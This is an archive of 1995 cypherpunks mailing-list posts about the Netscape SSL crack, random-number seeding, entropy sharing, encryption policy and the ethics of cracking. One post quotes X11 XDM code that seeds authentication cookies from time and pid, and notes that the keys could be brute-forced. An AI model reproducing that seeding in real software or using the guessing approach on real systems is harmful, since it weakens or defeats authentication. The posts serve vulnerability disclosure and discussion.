> > > > session key, making it impossible to "watch the wire".
> > > 
> > >   Wow, this is a great idea!!
> > 
> > Are you quite sure this is a good idea?
> > 
> > I'd be very scared of it.  In particular, it opens up the chance for
> > adversaries to feed you specially chosen numbers to pollute your seeds.

Suppose you divide your random material into several parts:

A: Userinput (updated from Keystroke timing etc.)
B: 'Random' numbers from remote server
C: Time, pid, ppid, etc..
D: other...

Whenever you want to incorporate new data into B you could do something like:
B = B xor Hash (A,B,C,D, fresh 'random')

This would be very hard to pollute with well chosen input.

> 
>   What I should have said is that its a very interesting idea.  Given
> current perceptions of netscape, I should have made clear that I
> wouldn't do something like this without getting a lot more discussion
> and review of possible dangers and how to avoid them.  I certainly
> can't fault anyone for wondering if we would just implement this
> without thinking it through, given recent events.
> 

  Frank





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Joe Tardo" <joe_tardo@genmagic.com>
Date: Thu, 21 Sep 95 11:59:48 PDT
To: "Jeff Weinstein" <jsw@netscape.com>
Subject: Re: Please send me SSL prob
Message-ID: <n1400438055.58002@qm.genmagic.com>
MIME-Version: 1.0
Content-Type: text/plain


        Reply to:   RE>>Please send me SSL problems...

Jeff:

The name chosen for SSL was, perhaps, unfortunate and misleading, but should
not get in the way of the kind of service it provides.  I keep combing the
spec looking for socket-like api's, and so far have not found any  :-).

> I've looked at
>what it takes to make some existing protocols work with SSL, and I'm not
>convinced that its always appropriate.  For example FTP and RCMD use
>multiple connections, which is a royal pain.

Doesn't HTTP use a new connection for every GET?

> If a secure IP standard emerges that is widely deployed and provides
>similar services, I don't see why SSL couldn't just go away (this is my
>opinion, not an official position of netscape).

The ipsec people are currently debating what it means to do replay detection
on an unreliable datagram service, what it means to authenticate 
individual users in a layer that only knows how to name host endpoints, how
a protocol specification deals with how policy would be set for mixed 
encryption service requirements, etc.  This is not the first time these 
points have been debated in the history of the universe, nor the first 
attempt at a 'one size fits all' security protocol.

I, personally, would not be too quick to expect IP security to solve all of 
your problems, but it will do a better job on, say, host-to-host disclosure 
protection.  It will, however, require new kernel code or low-level 
driver or hardware hacks,  which simultaneously provide the better 
protection and a barrier to security deployment for a product like 
Netscape's.

Now, how about fixing SSL's keying so it has perfect forward secrecy?

-Joe





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tomw@orac.engr.sgi.com (Tom Weinstein)
Date: Thu, 21 Sep 95 11:46:24 PDT
To: cypherpunks@toad.com
Subject: Netscape closes up 1 3/8 today!
Message-ID: <199509211846.LAA04164@orac.engr.sgi.com>
MIME-Version: 1.0
Content-Type: text/plain


In article <DF84AJ.41K@sgi.sgi.com>, carolann@censored.org (Censored Girls Anonymous) writes:

> Lookit that! 416 trades and 11 times there was more
> buying pressure than selling pressure..

> The rumors of bug fix are outweighing the facts of the crack!

> I am totally amazed! But think company insiders are probably
> supporting the stock.  Holding up better than ascii armor, it is. 

I think it probably has more to do with the fact that the name
"Netscape" has been on the front page of every major newspaper in the
US.  I guess bad press is better than no press at all.  And the press
hasn't even been that bad.

-- 
Sure we spend a lot of money, but that doesn't mean    |  Tom Weinstein
we *do* anything.  --  Washington DC motto             |  tomw@engr.sgi.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: iagoldbe@csclub.uwaterloo.ca (Ian Goldberg)
Date: Thu, 21 Sep 95 08:50:26 PDT
To: cypherpunks@toad.com
Subject: XDM has the same problem as netscape ?!
In-Reply-To: <199509202041.NAA07036@comsec.com>
Message-ID: <43s1j7$nd3@calum.csclub.uwaterloo.ca>
MIME-Version: 1.0
Content-Type: text/plain


In article <9509210631.AA18308@sfi.santafe.edu>,
Nelson Minar <nelson@santafe.edu> wrote:
>Last time I looked, the MIT-MAGIC-COOKIE-1 scheme used in X11R4 had
>the same problem: the random seed was based on the current time to the
>microsecond, modulo the granularity of the system clock. I think I
>figured that on my hardware, if I could figure out which minute the X
>server started (easy with finger), I'd only have to try a few
>thousand keys or so. Caveat: I never actually proved the idea.

Wow.  I just checked, and Nelson's right.

The seed is this:
#ifdef ITIMER_REAL
    {
        struct timeval  now;

        X_GETTIMEOFDAY (&now);
        ldata[0] = now.tv_sec;
        ldata[1] = now.tv_usec;
    }
#else
    {
        long    time ();

        ldata[0] = time ((long *) 0);
        ldata[1] = getpid ();
    }
#endif

and if you don't have XDMAUTH defined, the auth value is this:

        seed = (ldata[0]) + (ldata[1] << 16);
        srand (seed);
        for (i = 0; i < len; i++)
        {
            value = rand ();
            auth[i] = value & 0xff;
        }


Oh, well.  We knew X didn't have much in the way of security, anyway...

   - Ian




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Christian Wettergren <cwe@Csli.Stanford.EDU>
Date: Thu, 21 Sep 95 11:53:38 PDT
To: jirib@cs.monash.edu.au
Subject: Re: Exchange random numbers (was: Re: netscape's response)
In-Reply-To: <199509210958.TAA10764@sweeney.cs.monash.edu.au>
Message-ID: <199509211852.LAA22259@Csli.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain



| > Of course you have to be very careful, as you say. Did you see my
| > problem-section in the original letter? I included it above.
| ... [the referenced section elided by jirib] ...
| 
| If I only ever give out a hash of my seed, and only ever *add* any received
| info to my seed (and stir it in well), how can anyone find out anything?
| (Apart from hash weaknesses.)

Giving out contribution: 
     MD5(select_bits(my_seed, start_bit, stop_bit)) -> remote
Taking in contribution : 
     my_seed = my_seed XOR 
     ((select_low_bits(remote_contrib, contrib_width) << contrib_area)

You also need to keep track of who has contributed what, and how much.
This might become a problem if you don't have a safe authentification
mechanism, like baseing the tracking on the IP-numbers etc.

But I don't believe this is a real problem, since you always
contribute 'entropy', not exact values. You need to know the exact
state of the random generator to be able to predict how your
contribution will affect the generator.

The boot-strap stage is actually the big problem still. But if the
initial stages are 'random enough' to withstand a total crack, I guess
the randomness gathered will increase rapidly, and increase the
safety a lot.

| The only thing that remains is that I cannot really count on a stranger
| to actually give me something truly random. In fact, since at least
| one other person knows it, I shouldn't count any entropy from it at all.
|
| However, if I get e bits from each of n servers, and k of them are rogue,
| then I have e*(n-k) bits, ie e*n*(1-k/n). With a suitably conservative
| estimate of k/n, this should be acceptable.
| 
| In any case, accepting donations of entropy cannot possibly reduce the
| amount of entropy I have, can it?

This isn't a problem as I see it, he'll only know what bits he
flipped, not the actual state.

I guess someone could mount an attack on the remote_contrib, finding
the part of my_seed by bruting the remote_contrib that I submitted.
But even if that is done, you'll only know a small part of the total
seed. And the remote end can't choose which segment of my_seed that
will be revealed.

I also see a problem if an attacker is controlling the whole
environment, but this is no different from the original problem, and
a lot more unlikely.

| > and that you should only give out approximately the same amount of 
| > randomness to the neighbour, as you point out below.
| ...
| 
| I'm not sure I follow this one. Why?
| 
| If the neighbour is willing to trust me for more, and cannot possibly
| deduce my seed from the numbers ('cause it's a strong 1-way hash),
| the only thing it costs me is CPU time - it'd cost me more to keep
| track of who asked for how much when.

Well, the reason would be that if someone bruted your contribution,
they would still have to guess the remaining part. Double safe! :-)

| ...
| > My approach solves part of the problem of "the observable local
| > environment" problem. 
| ...
| 
| Then again, you can always ping. With a well-chosen target, you get
| 10 bits raw from the first packet... Perhaps about 7 or 8 of actual
| usable entropy (and before you flame me, ping melb.dialix.oz.au).

Yes, but if one assumes that the algorithm to gather the seed is
known, its quite possible for someone else to do it at the same time
as you do it, or even observe your ping packet req/reply. And how do
you determine which 'random host' to ping?

| Part of this is that once the sources of randomness are sufficiently
| diverse, it's just easier for an attacker to modify your s/w.
| Especially if you never throw out your seed, so that all your interactions
| since the beginning are unfathomably stirred into your current key.

Yes, I believe this is important too.

/Christian




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Eric Young <eay@mincom.oz.au>
Date: Wed, 20 Sep 95 20:38:49 PDT
To: cypherpunks@toad.com
Subject: Random Number State
In-Reply-To: <9509202150.AA08164@toad.com>
Message-ID: <Pine.SOL.3.91.950921113535.21127D-100000@orb>
MIME-Version: 1.0
Content-Type: text/plain



Some some ramblings on the RNG seeding issue, comments welcome.

I'm sort of in the position of Netscape in that I have an SSL library 
that needs good random numbers for both RSA key generation (soon DH)
and SSL sessions.
While most of the discussions have been how to generate random data, one 
solution I will probably follow is that when any 'semi-random' data is 
generated, make sure to save this for seed data the next time the
application starts.  I have faith in the RNG capabilites of my RNG (based 
on MD5) and my RAND_seed() routine only 'adds' to the RNG state (about 
1k's worth is kept).  I can continue to 'mix' the RNG state at any point in 
time.  My RND_seed() xors into the existing state, it does not overwrite.

Because my SSL/encryption library contains 'everything', I have the
ability to put calls to my RNG_seed() routine in places like when I 
decrypt a private key.  I can pass both the password (if the key was 
encrypted) and the private key 
into the RNG state (making sure any data that goes into the RNG state 
can not be determinied if a 'core' file is generated).
I will probably also put the time() into the RNG state whenever an 
SSL_connect or SSL_accept is made (I think I do already).  I may also put in 
select data that has been read from the remote host
While most of this data can be determined by watching 
network activity, if it is just a delta to the initial random 
state it is somewhat more useful.

The first time use 'x' runs the application they are made to 'generate' 
some reasonable random data.  For all subsequent executions of the 
program, any more semi (psuedo?) random data generated can be mixed in 
with the initial random data.  The profile of the usage of the 
application would end up determining the random data to use.

I feel it is a bit much to try to generate good random data every time 
an application is run.

I believe this is the type of aproach PGP uses (I have not looked at the 
code).

eric
PS  I also do some 'evil' things in that I load 'garbage' bytes from the 
    stack into my RNG state whenever the RNG is called.  It may not be 
    random, but I bet it is hard to determine from the outside the 
    running program :-)  It can only help :-).
--
Eric Young                  | Signature removed since it was generating
AARNet: eay@mincom.oz.au    | more followups than the message contents :-)





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Thu, 21 Sep 95 12:08:04 PDT
To: shields@tembel.org (Michael Shields)
Subject: Re: MIME
Message-ID: <199509211907.MAA18407@ix.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 01:24 AM 9/21/95 +0000, shields@tembel.org (Michael Shields) wrote:
>> >I think that it must be the content-type that is causing problems,
>> Yes, I agree. Make it something like ASCII text

>But it's not text/plain.  It's PGP'ed text/plain.  The only way to
>indicate this in MIME is with a content-type.  (Yes, they're working on
>a general way to encapsulate encryption.)

Part of the problem is that application/pgp is being used both for
encrypted data and also for clearsigned data, which really have different
handling needs.  With clearsigned, you might want to read it,
but might also want to PGP it.

One possibility is to do multipart messages with the body in one part
and a detached signature in another.
#---
# Bill Stewart, Freelance Information Architect, stewarts@ix.netcom.com
# Phone +1-510-247-0664 Pager/Voicemail 1-408-787-1281
#---





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Thu, 21 Sep 95 12:07:47 PDT
To: cypherpunks@toad.com
Subject: Re: Project: a standard cell random number generator
Message-ID: <199509211907.MAA18413@ix.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 02:50 PM 9/20/95 -0700, you wrote:
> In this sense, NSA ought to be *encouraging* Intel and
>IBM and Motorola to put "generate random bits" instructions into
>their instruction sets...

Is _that_ what was going on with Pentium division?  
Less seriously, thoguh, a UART might be a good place to add a random
number source, since it may be able to extract randomness from communication
line jitter, is usually an easily replaceable part on most machines,
and communicates at a higher speed than you're likely to need for
most randomness applications.

#---
# Bill Stewart, Freelance Information Architect, stewarts@ix.netcom.com
# Phone +1-510-247-0664 Pager/Voicemail 1-408-787-1281
#---





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: microbody@wirepool.ruhr.de (Matthias Jordan)
Date: Fri, 22 Sep 95 12:06:19 PDT
To: cypherpunks@toad.com
Subject: Re: Netscape sub rosa?
In-Reply-To: <ac850f682a021004638e@[205.199.118.202]>
Message-ID: <5uIxesBWJ2B@blank.wirepool.ruhr.de>
MIME-Version: 1.0
Content-Type: text/plain


Hello, Tim!

> Gee, where's that "Cypherpunks logo" when you really need it?
> 
> A rose covering the Netscape "N" logo? A crypto eagle swooping down and
> pecking at weak keys?

How about an anarchism-A (an A in i circle) whith the circle not
being totally closed thus describing a C?
CU!

  /\/\icroBod\/     |\?/|  SoziBits <----    Anschlaege Drogen Waffen
 /    \______/      | I |  Falken im Netz    RAF ETA KGB LSD XTC BND
                      ^
PGP2.3a key per EmpfBest.  ---  Frag' mich nach PGP
-- Wer vom Kapitalismus nicht reden will, sollte vom Faschismus schweigen




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: iagoldbe@csclub.uwaterloo.ca (Ian Goldberg)
Date: Thu, 21 Sep 95 09:35:06 PDT
To: cypherpunks@toad.com
Subject: Re: Fraud Fraut Froth
In-Reply-To: <199509211130.HAA20039@light.lightlink.com>
Message-ID: <43s46q$3qs@calum.csclub.uwaterloo.ca>
MIME-Version: 1.0
Content-Type: text/plain


In article <199509211130.HAA20039@light.lightlink.com>,
 <anonymous@freezone.remailer> wrote:
>NY Times, Sept 21, 1995.
>
>Fraud Can Flourish Without the Internet
>
>To the Editor:
>
[snip]
>
>Or is the banking industry whipping up hysteria among
>purchasers to curb fraud losses? Was the work of those
>graduate students funded by someone -- directly or indirectly?
>If so, by whom? A banking consortium? A high-tech company
>working on some patentable security scheme?

The work we did was not funded by anyone.  If someone out there would
care to rectify this situation, he can let us know. :-)

   - Ian "Grad students are not notoriously wealthy in this country,
            either, right?"




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Thu, 21 Sep 95 12:46:43 PDT
To: cypherpunks@toad.com
Subject: economic espionage (@#$%^&*)
In-Reply-To: <9509201546405398@ci.diamond-bar.ca.us>
Message-ID: <199509211936.MAA23834@netcom13.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain



>> >It was said that Pres. Clinton had given a speech while 
>> >visiting the  CIA HQ in Langley/Virginia. He allegedly 
>> >said in this speech that obtaining  industrial 
>> >informations has the highest priority and this were the 
>> >new  task for the spies.

ah yes, just like the way Clinton alone came up with the whole
Clipper idea as a way to balance the legitimate goals
of law enforcement with the right to privacy in society.

careful Bill, your strings are showing. and I won't say 
who is the puppeteer, but he has the initials N.S.A.

pardon me, but this new "economic espionage" sleazoid-intelligence-
agency-justifying bugaboo really annoys me.

boy, I wish I could get my job to work the way the government
works. I go to my boss, and say, "repeat after me: you will
be given a fat raise because you are crucial to the company".

I would *die* to see an op-ed in the NYT with the subject:
"economic espionage: the new bogeyman decoy after the cold war"







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: wb8foz@netcom.com (David Lesher)
Date: Thu, 21 Sep 95 09:52:22 PDT
To: cypherpunks@toad.com
Subject: Council of Europe proposes to outlaw strong encryption (fwd)
Message-ID: <199509211649.MAA11243@netcom22.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


**********************************************************

> SUBJECT: Euroclipper
> Apologies if this is old news to you folks, but thought I should              
> pass it on.


Date: Thu, 21 Sep 1995 00:42:39 -0400                                          
Subject: IP: Council of Europe proposes to outlaw strong encryption            
                                                                               
According to an article in `Communications Week International', the            
34-nation Council of Europe has agreed to outlaw strong encryption             
products which do not make keys available to governments.                      
                                                                               
The article, `Euro-Clipper chip scheme proposed', is on the front page         
of the magazine's issue 151, dated 18th September, which arrived in my         
mail this morning.                                                             
                                                                               
It relates that the policy was approved on the 8th September at                
Strasbourg by the Council, and coincides with an attempt by the                
European Commission to propose a pan-European encryption standard. The         
Council - unlike the Commission - has no statutory powers to enforce           
its recommendations. However, Peter Csonka, the chairman of the                
committee that drafted the document (and an administrative officer at          
the Council's division of crime problems) says that `it is rare for            
countries to reject Council of Europe recommendations'.                        
                                                                               
The proposal would make telecomms operators responsible for decrypting         
traffic and supplying it to governments when asked.  It would also             
`change national laws to enable judicial authorities to chase hackers          
across borders'.                                                               
                                                                               
Opposition to this measure was expressed by Mike Strezbek, VP                  
responsible for European telecomms at JP Morgan, who said that his             
organisation `will challenge any attempt to limit the power of our             
network encryption technologies very strongly'.                                
                                                                               
Czonka said that the Council had given consideration to business               
interests but had tries to strike a balance between privacy and                
justice. However, `it remains possible that cryptography is available          
to the public which cannot be deciphered,' his document says. `This            
might lead to the conclusion to put restrictions on the possession,            
distribution, or use of cryptography.'                                         
                                                                               
Apparently another international organisation, the OECD, has called a          
conference of its members in December to devise a strategy on                  
encryption.                                                                    
                                                                               
I for one will be making clear to my MP that his stand on this issue           
will determine how I cast my ballot at the next election. I note that          
John Major stated in a 1994 parliamentary written reply to David Shaw          
MP that the government did not intend to legislate on data encryption.         
I am disppointed that government policy has changed to the point of            
supporting the Council of Europe, and that this change has sneaked             
through during the parliamentary recess.                                       
                                                                               
Ross Anderson                                                                  
                                                                               
                                                                               



------- End of Forwarded Message



-- 
A host is a host from coast to coast.................wb8foz@nrk.com
& no one will talk to a host that's close...........(v)301 56 LINUX
Unless the host (that isn't close).........................pob 1433
is busy, hung or dead........vr vr vr vr.................20915-1433



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: s675570@aix2.uottawa.ca
Date: Thu, 21 Sep 95 09:53:32 PDT
To: cypherpunks@toad.com
Subject: Re: FROM A FRIEND . . . (or the joys of boating)
Message-ID: <Pine.3.89.9509211226.A29553-0100000@aix2.uottawa.ca>
MIME-Version: 1.0
Content-Type: text/plain



On Thu, 21 Sep 1995, Landon Dyer wrote:

>   naturally, commuting to canada is probably a *lot* cheaper than
> owning a boat.  the uninitiated have little idea what these holes-
> in-the-water really cost.... :-)

*Loud* chuckles. Who says you have to *own* the boat? (haha) A suitably
paid Canadian boat-captain could easily testify that you arrived every day
to the boat with your trusty laptop, to develop your software within Canada.

The disk with your saved code on it never left the boat. When you 
finished your development, you used a borrowed satellite phone to call up
your ISP in Canada (we're talking physical Canada, not virtual, maritime, and
bullshit Canada) to post your code and uuencoded executables to sci.cript,
and alt.test. And since you used a satellite phone, for the modem 
transmission, no US phone lines were used (a cellphone wouldn't do). 

Of course you wouldn't actually have to do any of this. The gentleman just
has to say it in court. The truth, the whole truth and nothing but.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Thu, 21 Sep 95 13:07:03 PDT
To: cypherpunks@toad.com
Subject: Prosecution of Cracking Security Systems
Message-ID: <ac87102143021004d973@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 9:42 PM 9/20/95, Brian Davis wrote:

>Certainly, Cypherpunks has gotten press lately, and what I've seen has
>been good press.  Capitalize on it.
>
>Finally, I've got to say that, as someone new to the concepts discussed
>here, I found it extremely cool to read about the latest break here and
>then see it in the news a day or two later.


Indeed, it gives you a day's head start in preparing a prosecution!

(Just kidding, of course. Brian may be a DA, but he's showing signs of
being "one of us.")

And on a serious note, the cracks of these various systems are helpful to
the overall community. Better locks.

To pick up on a point Brian made several days ago about whether or not
hackers who break into systems should be applauded, criticized, prosecuted,
whatever, this is how I see things, in direct parallel with the recent
Netscape cracks:

* Situation 1: A person who enters my home by bypassing locks cannot claim
to be "just testing security" and should be prosecuted for trespass, if
nothing else.

* Situation 2: However, a person who publically demonstrates that a
well-known type of lock is weak and can be easily bypassed is well within
his rights and is, I think, doing the community a favor. I mean that he
demonstrates this on a lock, or system, and not by breaking into a system.
(It may be true that some number of potential thieves use the knowledge
that a given lock is weak to commit crimes, but that's not the
responsibility of the person demonstrating the weakness.)

(Sidebar: There are some subtleties. What about someone who breaks into a
computer system and leaves a harmless message announcing his intrusion?
What about someone who enters my house while I'm asleep and leaves a
message saying "Get better locks!"? What about Randall Schwartz and his
security checks of his employer, Intel?)

It seems clear to me that the breaking of Netscape's security is an example
of Situation 2. And many cracker break-ins are Situation 1, though in many
cases the crackers are not full-fledge criminals and may think they are
just testing security. (This goes to motive, I'm sure Brian would agree,
and may be why a 16-year-old cracker gets a suspended sentence instead of
hard time.)

(A more problematic case is what about systems with very weak or no
security? This is somewhat like a yard with no clearly marked boundary, no
fence, etc., or like a beach towell with valuables left on it. We've
debated issues like this several times on the Cyberia list, so I won't
here.)

One thing that worries me is that some of the proposed laws about
intellectual property and enforcment of copyrights may make it illegal to
try to break the cryptographic protections of systems, even systems one has
control over. (Some similarities to the "no reverse engineering"
shrink-wrap licenses.)

It's conceivable that Netscape Communications could, under these
"anti-hacking" laws, seek a prosecution of some future Goldberg and Wagner.

My guiding principles about locks and security are these:

* Theft is theft, even if a bicycle is left unlocked or a house door is
left ajar.

* However, the first line of defense is for a property owner to lock his
property up, to place fences around property, etc. Cops cannot protect in
all situations, which is why security services and tools exist.

* Since enforcement resources are limited, I can understand why the
investigation of a theft involving unlocked, unsecured property is given
low priority. This doesn't make the theft "right," and if the thief is
somehow caught he cannot use the "But it was unlocked!" defense.

(These problems are lessened in a system where people pay for protection,
as with insurance systems, and of course as with anarcho-capitalism of the
sort discussed by Benson, Friedman, and others.)

--Tim May




Notice: With 1000 people on the Cypherpunks list, and many on other lists I
am on, nearly every article I write generates at least one question,
request for more information, dispute with my choice of words, etc. I have
been trying to respond to these, usually privately, but the burden has
become too much, and I no longer plan to respond to trivial or ephemeral
points. If you don't hear from me, this is why. Some requests for pointers
to information will still be handled, but I advise people to learn how to
use the archives and/or search tools.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Thu, 21 Sep 95 13:17:27 PDT
To: cypherpunks@toad.com
Subject: "Gnusaic"? Why not a Gnu-Style Web Browser?
Message-ID: <ac87162a440210044474@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain



I'm pretty happy with Netscape 1.1N, but John Gilmore's point about NCSA
Mosaic gives me a thought:

At 6:44 AM GMT 9/21/95, John Gilmore wrote:

>>   I realize that some cypherpunks think that we should make all of
>> our code publicly available.  In an ideal world that would be great,
>> but we live in a world with politicians, crooks, lawyers, stockholders,
>> etc...  Don't expect to see us posting our entire security
>> library source code to cypherpunks.
>
>Naah.  I think NCSA should've made Mosaic publicly available, because
>they wrote it with our tax dollars.  And I hold it against them that
>they started the trend of "zero-cost personal-use binaries but no
>commercial use" that many Net users still confuse with Real Free
>Software (free as in freedom).  But Netscape owns its code, it can do
>whatever it wants with it.

Why not a Gnu-style Web browser? I don't know if the original Mosaic can be
used and added to, but I can imagine something like this could be done.

Web browsers are becoming, for many of us, our de facto interfaces to the
Net, not just the Web. A project to make a truly freely distributable Web
browser and Web server (the other part of the puzzle) could be interesting.
Strong crypto could be added by volunteers working in their specialties,
and the "Web proxie" could be put in with robustness (D-H forward secrecy,
for example).

I'll stop now, as I've never been a Gnu customer (except for Emacs), and so
I'm not really in a position to comment and speculate on Gnu.

For all I know, Stallman and others have already thought of this and are
working on it.

--Tim May


Notice: With 1000 people on the Cypherpunks list, and many on other lists I
am on, nearly every article I write generates at least one question,
request for more information, dispute with my choice of words, etc. I have
been trying to respond to these, usually privately, but the burden has
become too much, and I no longer plan to respond to trivial or ephemeral
points. If you don't hear from me, this is why. Some requests for pointers
to information will still be handled, but I advise people to learn how to
use the archives and/or search tools.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rob Vaughn <robv@teleport.com>
Date: Thu, 21 Sep 95 13:31:56 PDT
To: cypherpunks@toad.com
Subject: [NOISE] Re: NYT on Netscape Crack
Message-ID: <199509212030.NAA17997@desiree.teleport.com>
MIME-Version: 1.0
Content-Type: text/plain


Perry sez:

>I'll pay for the "I broke Netscape's Security" T-Shirt for the
>enterprising person that takes the time to find them in the object
>code. (See Sameer's page on the shirts he's developing as prizes for
>the Netscape flaw finders.)

I find it very ironic that a company that recently raised about a
gadzillion dollars through a public stock offering has been able to
sit back and let people find problems with their software for free.
Now people like Sameer and Perry are offering rewards for it.  Kudos
to them, but I think Netscape should be the one making an offer like
this.

A textbook author/prof who taught a class using his own book had a
great method for finding mistakes in the new edition: he had us buy
the current edition and gave us copies of each chapter of the new
edition as we got to it, then he offered a $10 reward for each typo or
mistake found, and a $100 dinner for two and credit in the new edition to
whomever found the most mistakes by the end of the semester.  I made $160
before I had to drop the class due to a schedule conflict.

In the end, he said he was able to find over 100 errors, and considered it
the cheapest and most thorough proofreading he'd ever paid for.  And the
class got a big charge out of it.

Netscape should be offering rewards for people who find problems with
their software.  They'll get a lot of hard work for almost free (since
you only get paid if you do find something) and in a year or two they'll
have one of the most solid applications on the market.  Lord knows it'll
help raise public confidence too.  If a tee-shirt motivates people, think
what $US 1000 reward would do.  Or $e 2000 in credit towards goods
purchased through Netscape commercial servers?

Rob V.



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sameer <sameer@c2.org>
Date: Thu, 21 Sep 95 13:35:47 PDT
To: tomw@cthulhu.engr.sgi.com
Subject: Re: Netscape closes up 1 3/8 today!
In-Reply-To: <199509211846.LAA04164@orac.engr.sgi.com>
Message-ID: <199509212030.NAA05084@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


	The only bad publicity is no publicity.


> 
> In article <DF84AJ.41K@sgi.sgi.com>, carolann@censored.org (Censored Girls Anonymous) writes:
> 
> > Lookit that! 416 trades and 11 times there was more
> > buying pressure than selling pressure..
> 
> > The rumors of bug fix are outweighing the facts of the crack!
> 
> > I am totally amazed! But think company insiders are probably
> > supporting the stock.  Holding up better than ascii armor, it is. 
> 
> I think it probably has more to do with the fact that the name
> "Netscape" has been on the front page of every major newspaper in the
> US.  I guess bad press is better than no press at all.  And the press
> hasn't even been that bad.
> 
> -- 
> Sure we spend a lot of money, but that doesn't mean    |  Tom Weinstein
> we *do* anything.  --  Washington DC motto             |  tomw@engr.sgi.com
> 


-- 
sameer						Voice:   510-601-9777
Community ConneXion				FAX:	 510-601-9734
An Internet Privacy Provider			Dialin:  510-658-6376
http://www.c2.org (or login as "guest")			sameer@c2.org



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Joel McNamara <joelm@eskimo.com>
Date: Thu, 21 Sep 95 13:41:50 PDT
To: cypherpunks@toad.com
Subject: Cryptography book source
Message-ID: <199509212041.NAA17913@mail.eskimo.com>
MIME-Version: 1.0
Content-Type: text/plain


Just stumbled on to an online book vendor that advertises over a million
titles available for order, many discounted from list.  Very nice Web
interface.  A quick search for "cryptography" displayed 121 titles.  A wide
range, from Crypto proceedings to technical to historical.

Check out:

http://www.amazon.com

Joel McNamara
joelm@eskimo.com - http://www.eskimo.com/~joelm for PGP key
Thomas Jefferson used strong crypto, shouldn't you?
 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jiri Baum <jirib@cs.monash.edu.au>
Date: Wed, 20 Sep 95 21:23:36 PDT
To: cwe@Csli.Stanford.EDU (Christian Wettergren)
Subject: Exchange random numbers (was: Re: netscape's response)
In-Reply-To: <199509200729.AAA24565@Csli.Stanford.EDU>
Message-ID: <199509210419.OAA28994@molly.cs.monash.edu.au>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Hello cypherpunks@toad.com
  and Christian Wettergren <cwe@Csli.Stanford.EDU>
 
Christian Wettergren wrote:
...
> One wild idea that I just got was to have servers and clients exchange
> random numbers (not seeds of course), in a kind of chaining way. Since
...

Okay, that doesn't sound so hard...

Have a look at
http://www.cs.monash.edu.au/cgi-bin/cgiwrap/~jirib/random?RandValue
where you replace RandValue by any text string.

Please do not try to break the implementation, I *know* you can overrun
buffers, use shell metacharacters and generally stuff around.
Just don't, OK? Thanks.

Feel free to try to break the algorithm, though.


> Problems:
> * watch out for "multiply by zero" attacks by a rogue server/client.
> * watch out for "almost singular values" in the same way.

Don't know about these...

> * only let one source contribute a certain amount of randomness, like
>   (key length)/(aver # of peers).

Well I don't keep track of entropy, so that doesn't apply, does it...

> * never reveal your current seed, only a non-trivially derived random 
>   value from it. (of course)

I reveal md5 hash of my seed only.

> * make sure your initial seed is good enough, or the whole thing is
>   broken.

Well, entropy put in must be greater than entropy used or lost through
cracked connections. (Ie not just "initial", also entropy put in along
the way.)

I fail this point either way.

> * perhaps save part of the previous session state into a protected
>   file, to be able to keep up the quality of the initial seed.

Yup, I do that (though "quality" would be quite a bit of a euphemism, and
the file is hardly protected at all).


Have fun!

Jiri
- --
<jirib@cs.monash.edu.au>     <jiri@melb.dialix.oz.au>     PGP 463A14D5

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2i

iQCVAwUBMGDnpixV6mvvBgf5AQEExQQAsqCTmTOI0aT7YBnCsYyvEp0y3gWFFZdf
qbG5wvpFGvJMvRxn8A61AEeX0CkQ7ZLVDwAo4K6N+SGMeXDWKkUtHRBS1cHomgJP
Kf98rFxHXp3SS1eXUKEyzlcY0zkXQ4wunR7nsBAlvVVPcexINZ2++2bFKyyUKNTm
KZ39Fj1TEf4=
=oC33
-----END PGP SIGNATURE-----



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anarchist <rr251070@hvcc.edu>
Date: Thu, 21 Sep 95 11:31:35 PDT
To: cypherpunks@toad.com
Subject: Has anyone seen the CatMan (catburgler)?
Message-ID: <Pine.3.89.9509211446.A68256-0100000@academ.hvcc.edu>
MIME-Version: 1.0
Content-Type: text/plain


